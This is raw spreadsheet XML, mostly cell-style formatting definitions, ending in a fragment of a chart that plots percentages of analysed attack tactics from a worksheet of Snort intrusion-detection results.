    <xf borderId="4" fillId="14" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="14" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="14" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="11" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="11" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="11" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="30" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="31" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="31" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="15" fontId="31" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="15" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="32" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="7" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="15" fillId="7" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="31" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="16" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="16" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="16" fontId="6" numFmtId="49" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="16" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="16" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="16" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="16" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="8" fillId="16" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="9" fillId="16" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="31" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="35" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="35" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="1" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="35" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="35" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="35" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="36" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="10" xfId="0" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="1" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="23" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="35" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="35" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="2" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="35" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="35" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="35" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="37" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="11" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="38" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="15" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="12" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="8" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="12" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="8" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="8" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="8" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="8" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="38" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="38" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="10" fillId="8" fontId="21" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="8" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="8" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="8" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="12" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="39" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="23" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="23" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="23" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="23" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="39" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="15" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="18" fillId="9" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="19" fillId="9" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="20" fillId="9" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="21" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="22" fillId="0" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="22" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="22" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="23" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="25" fillId="0" fontId="42"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_rels/chartEx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PARA RS1</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Snort'!$K$27:$K$28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PORCENTAJES TÁCTICAS ANALIZADAS (TÉCNICAS)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>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Lbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
